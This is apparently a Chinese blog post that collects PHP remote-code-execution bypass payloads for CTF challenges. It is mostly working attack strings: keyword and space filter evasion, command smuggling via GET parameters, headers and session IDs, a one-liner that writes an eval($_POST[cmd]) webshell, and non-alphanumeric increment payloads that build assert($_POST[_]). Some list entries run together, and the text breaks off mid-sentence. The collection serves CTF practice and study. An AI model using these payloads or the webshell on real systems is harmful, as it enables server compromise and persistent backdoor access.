PHP RCE 绕过技巧总结
一、关键字绕过
1. ban flag
转义符、通配符:
1 | ?c=system('tac fla\g.php'); |
2. ban 空格
%09编码绕- 重定向
<>绕(不能将<和/一起用),但是ca\t<>fl\ag可以 {cat,flag.txt}${IFS}$IFS$9
3. 无字符 RCE(拼函数)
1 | show_source(scandir(getcwd())[2]); |
show_source / highlight_file / readfile / var_dump / var_export(echo file_get_contents())(print_r(file()))等价。
pos(localeconv()) 可以代替 getcwd(),dirname('FILE') 也可以。
1 | print_r(scandir(getcwd())); |
外带数据:
1 | c=eval(array_pop(next(get_defined_vars())));&1=system('ls /'); |
array_pop 会删除数组最后一个并返回。
1 | system(getenv(HTTP_X_CMD)); |
3.1 绕过 /
环境变量 ${HOME%%root}
4. 绕过 system 等 PHP 函数
- 反引号
execshell_execpopenproc_openpassthru(systee|systel)('tac /f???');("sys"."tem")("ca"."t /fl"."ag");
5. 绕过 cat
tacmoresortlesstailstringsnlvirev- 复制、重命名、移动:
cp /flag /var/www/html/1.txtcat /flag|tee 1.txtrenamemv
6. 外带
6.1 外带 GET
1 | ?c=eval($_GET[1]);&1=system('tac flag.php'); |
写马:
1 | $a='<?p'.'hp ev'.'al($_P'.'OST['.'cmd]);?>'; |
include被 ban 用require,include_once,require_once
6.2 外带 Session
1 | ?c=session_start();system(session_id()); |
再在请求包中附带 PHPSESSID=ls,但这里不解析空格。
7. 无字符 RCE
^|~- 自增
当以上符号都被 ban(7.0.12 以上版本不可用,使用时需要 URL 编码):
1 | $_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]); |
固定格式,构造出 assert($_POST[_]);,然后 POST 传入 _=phpinfo();
如果过滤了 @:
1 | ctf_show=[]._;$__=$_['!'==','];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;$$_[_]($$_[__]); |
引号被 ban:
1 | ctf_show=$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;$$_[0]($$_[1]); |
过滤 /:
1 | $_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]); |
除这些之外还可以用 `` `$
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.